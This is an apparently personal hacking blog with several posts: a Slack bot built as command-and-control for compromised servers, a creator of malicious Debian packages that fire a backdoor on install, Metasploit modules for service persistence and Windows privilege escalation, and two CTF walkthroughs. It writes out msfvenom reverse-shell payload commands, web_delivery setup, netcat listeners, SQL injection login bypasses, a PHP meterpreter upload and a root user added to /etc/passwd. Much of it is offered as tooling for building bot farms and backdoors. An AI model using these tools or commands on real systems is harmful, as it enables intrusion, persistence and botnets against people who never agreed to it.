Saturday 6 May 2017

SlackBots - Rebirth of IRCbots?

Its not been a while since Jeremy and Jeff Dimmock made a post and after a bit of googling, i came up with an idea "why not making something like IRC bots with Slack....". Really nice write-ups .. if you finds my post boring then you can check their posts i mentioned in bottom of my post lol.

code => https://github.com/ChaitanyaHaritash/SlackBot

What is Slack?

Slack is a cloud-based team collaboration tool founded by Stewart Butterfield. Slack began as an internal tool used by their company, Tiny Speck, in the development of Glitch, a now defunct online game.The name is an acronym for "Searchable Log of All Conversation and Knowledge".
https://en.wikipedia.org/wiki/Slack_(software)

What are SlackBots?

Slack bots, basically works on POST/GET methods and json plays a huge role making it possible. 
Slack Bots are really helpful for making automated responses for some common messages in chat area and handling various other tasks ..  
Here i've used same with red team perspective :P i just defined some commands in scripts and exact response it should put up in chat are.

How this magic happens?

Well, i used a python module made by slack "slackclient".. now i just setup a local server with port 5000 forwarded and for this i used ngrok .. and when all required fields are filled in script it just stimulate everything... 
My main focus was on to making something which requires less dependency and works on non privileged user too .. for example: to gain persistence over owned servers like exactly how traditional ircbots used to do back in days (don't know about these days lol).

HELP?  

[os] - Retrive OS and Current User info
[issue] - Issue of linux box 
[p_ip] - Retrive public IP of box
[uname] - Uname of Box
[coffee] - Print fancy coffee mug in chat area
[help] - List all help and ablities you have with this bot
[shell] - Execute a Shell command
[meterpreter]- Spawn Meterpreter session

Meterpreter Shell Via Bot

Actually it wasn't tough for me at all cos i've done same thing before with kimi ..
I just used web_delivery module here...


Client Side:
$ ./bot.py

Attacker side :
$ sudo msfconsole -qx 'use exploit/multi/script/web_delivery; set srvhost <host_ip>; set lhost <host_ip>; set uripath /SecPatch'

chat_area> meterpreter <attacker_ip>

Getting Everything Set

>Generate "Legacy Token" and paste it into "s_token" variable space in script


>Download and Install ngrok and get port forwarding to port 5000 "./ngrok http 5000",

>Grab anyone of what temporary forwarding link it generates and navigate to generate outgoing webhook token. Select channel name and past forwarding link into URL field and copy the token it generated(dont forget to put "lol" in URI).


> Now just fill all variable space in script (o_token,s_token,CHAT_A).

Hard part finishes here .. i know how many hours i've spent understanding all this :P 
now lets test!!
Okay move to your chat area and run script ;) dont worry about modules it'll get installed automatically you just gotta restart it and it'll run smoothly in second try.


Voila! so its working good ;)

Conclusion

This bot is result of curiosity and please use it for research and study :) 
Its completely open source code so you are free to ensue further development on it... 
Slack Bots can be next generation of irc bots for sure .. in fact better than irc bots cos besides this slack provides other services too like to directly interact with irc you have so you can combine both of'em to come up with something awesome :D .. i still have to explore so many of them pfff :P 

Also as far as i've observed .. slack bot are more secure than irc bots in terms of hijacking as it requires 2 keys to join channel instead of irc bots in which one can easily jump into channel and hijack it .. also like irc servers were easily compromise with UnrealIRCD exploits....
So overall its a good place to grow a bot farm :)  

NOTE:: 

Option "shell" is delivering commands over victim box but its not delivering results on chat area .... i ended up scratching my head and finally added meterpreter payload as its substitute, so if you come up with an idea then do ping me on twitter :) would be happy to have your suggestions...

MISC


Doubts? Insults?

@bofheaded

Saturday 4 March 2017

KIMI - Malicious Debian Package Creator

Hey readers !
During last month's ending i was thinking on latest updates of Venom Shellcode Generator and while having conversation with r00t-3xp10it, i strikes with an idea for generating malicious debian packages which i was in mood to implement in my paused project "Ginni Botnet" earlier.

This post is for all those who still have doubts for Kimi.

I did a bit research on basically "how i can make it dependency free" cos i've seen loads methods in which 3rd party tools were involved and as i'm lazy to install dependency tools i decided to make one for mine :') .

Kimi is name inspired from "Kimimaro" one of my favriote charater from anime called "Naruto".

Kimi is a script which generates Malicious debian package for metasploit
which consists of bash file, same bash file is deployed into "/usr/local/bin/" directory.

Backdoor gets executed just when victim tries to install deb package due to postinst file

Bash file injects and also acts like some system command which when executed by victim
and attacker hits with session.

[Plus Points]
-- Fully indiependent. Means user no need to install any debian package creator
-- Can be integrated with any payload generator easily due to engagements of arguments.

[Download Link]
git clone https://github.com/ChaitanyaHaritash/kimi 
[Getting Everything Set]
Kimi basically depends upon web_delivery module and every thing is automated. 
all the attacker needs is to do use following command :

sudo python kimi.py -n nano -l 127.0.0.1 -V 1.0
[NOTE]
This project was made to be integrated with Venom Shellcode Generator 1.0.13.
It can be used standalone also all user needs is to change uripath in msf variables
------------------------------------------------------------------------------------------------------------

[Tested on ]
-- Linux Mint 17.2 Cinnamon (Ubuntu 14.04) 
-- ParrotOS (Debian Jessie)
-- Kali Rolling 2.0

[Updates from prototype]
-- Added "postinst" file creation function to make embeded malicious file execution automated
-- Added RC file generation function to fully automate with handler opening, means no need to
    set handler manually.
-- Patched some common bugs [special thanks to r00t 3xp10it :)]

[In Action]




[Video]



Insults and doubts are most welcome :') @bofheaded #SSA

Monday 5 December 2016

CTF HackDay: Albania - WalkThrough

Hey Readers,
So here i'm up with another CTF i've recently solved. It was kinda tricky (unexpectedly). But after irritating seniors with my problems related to it, i finally managed to solve it all :P .

Download > https://www.vulnhub.com/entry/hackday-albania,167/


So first thing first .. determining the target. I scanned network for live devices. (Our target was with IP "192.168.0.107").

Alright i did some intense scan on our target. Scanned for port range 0-10000. and finally ended up with 2 open ports 8008(apache server) and 22 (SSH). Also i got some directories.

$ sudo nmap -T4 -A -v -p 0-10000 192.168.0.107


Dirs i got :

/rkfpuzrahngvat/
/slgqvasbiohwbu/
/tmhrwbtcjpixcv/
/vojtydvelrkzex/
/wpkuzewfmslafy/
/xqlvafxgntmbgz/
/yrmwbgyhouncha/
/zsnxchzipvodib/
/atoydiajqwpejc/
/bupzejbkrxqfkd/
/cvqafkclsyrgle/
/unisxcudkqjydw/
/dwrbgldmtzshmf/
/exschmenuating/
/fytdinfovbujoh/
/gzuejogpwcvkpi/
/havfkphqxdwlqj/
/ibwglqiryexmrk/
/jcxhmrjszfynsl/
/kdyinsktagzotm/
/lezjotlubhapun/
/mfakpumvcibqvo/
/ngblqvnwdjcrwp/
/ohcmrwoxekdsxq/
/pidnsxpyfletyr/
/qjeotyqzgmfuzs/

I then opened link "192.168.0.107:8008" on which apache was running and got prompted with a message box "Ne qofte se jam UNE, e di se ku te shkoj " > Translated > "If I am, I know where to go".



I started visiting each dir and ended with a meme :/


But there i found a directory named "unisxcudkqjydw" which had a bit differ page asking me to redirect on page "/unisxcudkqjydw/vulnbank/" with message "IS there any /vulnbank/ in there ???". I visited that link and got a login page of some "Vuln Bank".


I tried some random combinations for auth bypass but unfortunately non of em worked, except one

Username : " '
Password : " '

Got prompted with an SQL Error. I thought it was my lucky shot :P and tried sqlmap and various other SQLi tools, but result was negative :/


Finally i downloaded a list for username and password and ran it over hydra. LOL my fate really worked (I dont use hydra and hate BruteForce attacks :/ :P)
I got a working combination

Username : ' or 'a' = 'a' --
Password : #


Okay!! so i was finally seeing some hope to solve it :).

Tried uploading php files directly, but that didn't worked. I immediately generated php backdoor via msfvenom and renamed it with extension ".php.jpg". Opened handler and executed the payload by visiting the link where it was saved to.


Then i just gained the bash shell with command :

$ /usr/bin/python3 -c 'import pty; pty.spawn("/bin/bash")'


I then checked all files and directory carefully if i could find some hint, but everything was useless. I thought config.php would work. I opened it and got user and pass to mysql with root credentials, thought it could be same credentials for root user login too, but result was negative.

After getting literally cooked up :P i checked for writable dirs on machine with command :

$  find / -writable -type f 2>/dev/null

LOL i noticed /etc/passwd was writable :P Bingo !! there i strikes with an idea ... "what if i manually add another user in passwd file ?" (Reference which helped me).

I then generated a hash password using openssl.

Useraname : dope
Passoword : dope


Now i just got back to meterpreter. Opened and edited /etc/passwd with option "edit". Added new user at bottom, and saved the file.

dope:$1$MamNpKxX$/zIJhc75C0O9zRrTxxGYB/:0:0:test:/root:/bin/bash

Edited /etc/passwd just look like :


Here i started having intention for getting escalated to root privilege soon.

And finally, I ran command " su ", entered password for user i just made, And Boom !! It worked :P finally i captured the flag :D

$ su dope  
$ id
$ cd /root && cat flag.txt


Special Thnaks to : VulnHub :) <3
Follow me on twitter : https://twitter.com/Indi_g34r

Sunday 13 November 2016

deploy_service_payload - Post MSF module For Deploy A Persistence Service Payload

[What Does This Module Do?] 
deploy_service_payload.rb uploads your payload.exe to target system (DEPLOY_PATH) and creates a service pointing to it (SERVICE_NAME). 

The service will auto-start with windows with Local/System privileges. Rebooting the system or restarting the service will run the malicious executable with elevated privileges. "WARNING: This
module only supports .exe executables to upload".

[NOTE]

BUILD SERVICE PAYLOAD:
$ sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<Attacker Port> -a x86 --platform windows -f exe-service -o Program.exe

--WARNING: This module will not delete the payload deployed"
--WARNING: Note that only executables explicitly written to interface with the Service Control
--Manager should be installed this way. While SC will happily accept a regular non-service binary,
   you will receive the fatal Error 1053 when you attempt to start the service, please read the follow
--Article: How to Run Any Program as a Background Service in Windows

[INFO]



[INSTALLATION]

1* Download Module from {HERE}
2* Copy the ruby file in 
/{path}/metesploit-framework/modules/post/windows/manage/
3* Open msfconsole and issue command "reload_all" to reload paths.
4* use post/windows/manage/deploy_service_payload

[ADVANCED OPTIONS]



[USAGE]

NOTE: Im the follow example we are going to deploy a NETCAT executable on attacker machine (Its not mandatory the use of netcat [ nc.exe ], Default its to deploy a built-in service executable).

To be able to deploy a NETCAT client we need to activate module options 'USE_NETCAT'  | 'NC_LHOST' | 'NC_LPORT' and manually set a NETCAT lhandler to recibe the remote service connection...


-- DEPLOYING PAYLOAD :

1* set USE_NETCAT true
2* set NC_LPORT 31337
3* set NC_LHOST 192.168.0.100
4* set DEPLOY_PATH {deployment path in victim box}
5* set LOCAL_PATH /home/{user}/Desktop/nc.exe {executable to be uploaded}
6* set PAYLOAD_NAME nc.exe
7* set SERVICE_NAME infection
8* set SESSION 1

{Opening netcat Listener on Desired Port to recibe remote service connection}

$ sudo nc -lvp 31337

Expected Results :  


-- HIDING PAYLOAD :

1* set HIDDEN_ATTRIB true
2* set DEPLOY_PATH {deployment path in victim box}
3* set PAYLOAD_NAME nc.exe
4* set SESSION 1

Expected Results :


-- CHECKING SERVICE STATUS :

1* set SERVICE_STATUS true
2* set SERVICE_NAME infection
3* set SESSION 1

Expected Results :


-- DELETING REMOTE SERVICE : :

1* set DEL_SERVICE true
2* set SERVICE_NAME infection
3* set SESSION 1
--WARNING: This module will not delete the payload deployed"
Expected Results :


[VIDEO DEMO]




[Credits]

Module Author: pedr0 Ubuntu [r00t-3xp10it]
Special Thanks: Fatima Ferreira | Chaitanya



Sunday 30 October 2016

WSearch - Privilege Escalation via Weak Service Permissions (MSF Module)

Hi guys!!
So, almost after a week full of hard work we finally made our another post module for windows privilege escalation after MSI_privilege_escalation.

[What is WSearch ?]

SearchIndexer.exe is the Windows service that handles indexing of your files for Windows Search, which fuels the file search engine built into Windows that powers everything from the Start Menu search box to Windows Explorer, and even the Libraries feature.  --Wikipedia

[INFO]

--Vendor : Microsoft WSearch (windows indexing) service [SearchIndexer.exe]
--Vulnerability Type : Persistence backdooring + Privilege Escalation
--Versions Affected : Windows XP, VISTA, 7, 8, 9, 10
--Severity : critical

--Description:
The WSearch service uses one executable.exe set in binary_path_name
and runs it has local/system at startup, this enables local privilege_escalation/persistence_backdooring.
To exploit this vulnerability a local attacker needs to replace the executable into the binary_path_name
of the service. 'Rebooting the system or restarting the service will run the malicious executable with
elevated privileges.

[What factors are affecting privilege escalation on windows with the help of this application ?]


                                                                     

We ran command "sc query WSearch" and got result that its state is always in running mode.
With this we can conclude our backdoor can execute all the time and keep system in illusion  replacing original process (WSearch), which could lead to persistence.



We can notice that application is running with NT/Authority privilege. so we can make it persistence with Administrator's privileges.



And finally, we can observe, application START_TYPE is set to AUTO_START mode. So that means that process will start on just after the boot. Also we can observe that BINARY_PATH_NAME can be replaced, so we can save our backdoor with application name i.e SearchIndexer.exe can be replaced with backdoor with same name as of application.

After concluding all these symptoms, we can now build a Metasploit's post module for privilege escalation.



[Advanced Options]



[Proof Of Concept]

--Installation Steps : 

  1. Download module from [ here ] & copy  persist_priv_Wsearch.rb to 
      ../{path}/metasploit-framework/modules/post/windows/escalate/persist_priv_Wsearch.rb
  2. open msfconsole and execute command "reload_all"

-- Exploitation Steps :

1. Get meterpreter session somehow
2. use post/windows/escalate/persist_priv_Wsearch
3. Rename your backdoor to "SearchIndexer.exe"
4. Set UPLOAD_PATH <path to backdoor.exe>
5. set session <session_id> 
6. exploit

 Expected Results : 


-- Reverting Everything To Normal : 

1. set DELETE_PERSISTENCE true
2. set session <session_id>
3. exploit

  Expected Results :



-- Checking Service Setting 

1. set SERVICE_STATUS true
2. exploit

    Expected Results : 



--[Credits] : Pedro Ubuntu [r00t 3xp10it]  | milton_barra | Chaitanya Haritash

Saturday 15 October 2016

CTF FristiLeaks: 1.3 - Walkthrough

I generally doesn't solves CTFs but after viewing walkthrough of one of my close friend i thought even i must give it a try :P (yea these days i had less work as compared to past some weeks and i watched too much movies ;_;).

So, i thought to try fristileak 1.3. Yea in beginning it was a bit puzzling but then i started having idea about further challenges one after another.


So First thing's first lets scan for live hosts in our network and grab open ports of the target host.


$ nmap -sn 192.168.0.0/24


$ nmap -T4 -A -v 192.168.0.100


OK ! so i got port 80 open here with 3 disallowed entries /cola , /sisi, /beer. Nice lets check em


Our main page, lets check for cola,sisi,beer :D 


Damn !! i got nothing except this meme :/ so here i tried some random links and finally found something on /fristi :D and yea it was a login page !!


here i begin checking page source and found some encrypted info, as much as my guess it was base64.




here i scrolled a bit up and found image being decoded, i decided to replace the encrypted code of image with the base64 i found apart from whole code.


Bingo !! after decoding base64 i got some weird text "keKKeKKeKkEkkEk". LOL easy guess "PASSWORD" :V . I then started searching for username and the one thing which diverted my mind the most, there was a note inside the source of page.


"TODO:
 We need to clean this up for production. I left some junk in here to make testing easier.

- by eezeepz
"

Now here nothing is looking so suspicious except the name of the one who left this comment "eezeepz".

i decided to make combination like 

username : eezeepz
password : keKKeKKeKkEkkEk

and got successful access :D wew !!

next i found only option to upload files but in image format (as i tried to it directly with .php format and that didn't worked).

So i generated php payload via msfvenom and changed its format to .php.png

$  sudo msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.104 lport=4444 -f raw


lol meterpreter i love u :P 





Lets try to gain access to bash shell :D 


Lets check users in home dir.


ok so there are 3 users in which i have permission to access "eezeepz" user's directory.


I did "ls -la" to list all dir with their respected permissions. There were so many files which were like some commands of /user/bin file but one file attracted my attention it was a txt file named "notes.txt" so i decided "cat notes.txt" to open it. and i found hints for next challenge.



ok so as it simply says, i have privilege to use commands like , chmod, df , cat, echo, ps, grep, egrep.
and i if i execute anyone of'em by making file "runthis" in /tmp dir, ill have my results delivered to file named "cronresult". LOL no guess it was sure that user admin is source to other user and eventually to root. "chmod 777 admin -R"

i decided to change permission of user admin's dir as i got privilege to use command "chmod". I executed following set of commands and got positive result as expected :P. 

$ echo “/usr/bin/../../bin/chmod –R 777 /home/admin” > /tmp/runthis 
$ ls -lah /home
$ ls -alh /home/admin

Found some suspicious text files which could be hint to another challenge.

-- whoisyourgodnow.txt
-- cryptedpass.txt
-- cryptpass.py

2 files were with some encrypted text in which one of em was in base64 and other was some random text (as much as i guessed) and the 3rd one was a python file to decode those pass. I decided to decoded one of'em, thought to gave a start with that base64 one.



So it was a password (guessed so , cos password for admin panel was also being disclosed in the same manner)

I decided to try for fristigod. and got successfully login :) 


after owning fistigod user i came one step more closer to root :D 


So i was in dir /var/fistigod as i unfortunately didn't found any hint in /home/fristigod/. There i noticed some hidden files one of them was .bash_history , i decided to open it and found some set of commands have been recorded in that file, like whosoever been there before me had used em, i thought to give them a try ( 3:) evil mind)

$ cat .bash_history 

"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
ls
pwd
ls -lah
cd .secret_admin_stuff/
ls
./doCom 
./doCom test
sudo ls
exit
cd .secret_admin_stuff/
ls
./doCom 
sudo -u fristi ./doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
sudo /var/fristigod/.secret_admin_stuff/doCom
exit
sudo /var/fristigod/.secret_admin_stuff/doCom
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
groups
ls -lah
usermod -G fristigod fristi
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
less /var/log/secure e
Fexit
exit
exit

""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""


hmm ... 

Okay !! now i was a bit tired and decided to do "sudo -l" to get the $PATH


"/var/fristigod/.secret_admin_stuff/doCom" its was a clear hint that this file have some privilege to change permissions or to do some tasks from root's permission , cos its owned by root.

i decided to execute this file "doCom"

$  ./.secret_admin_stuff/doCom

and got prompted with result 

"Nice try , But wrong user ;)"

There i decided to use "sudo" with argument "-u"

$ sudo -u fristi ./.secret_admin_stuff/doCom

Again i got an hint of usage of this file 

"Usage: ./program_name terminal_command ..."

lol here i got some idea that this file will elevate privilege of files of our choice :P i decided to go with /bin/bash, after all who the hell doesn't wants /bin/bash have full privilege? ( 3:D evil mind)

$ sudo -u fristi ./.secret_admin_stuff/doCom /bin/bash

Volia!! 






Thx Aaditya Purani :D for being an inspiration bro :D post dedicated to u bro ^_^

=> Walkthrough to Billy Madison 1.1 By Aaditya Purani

---------

Okay !! So here i ends up this post :) hope you like it :)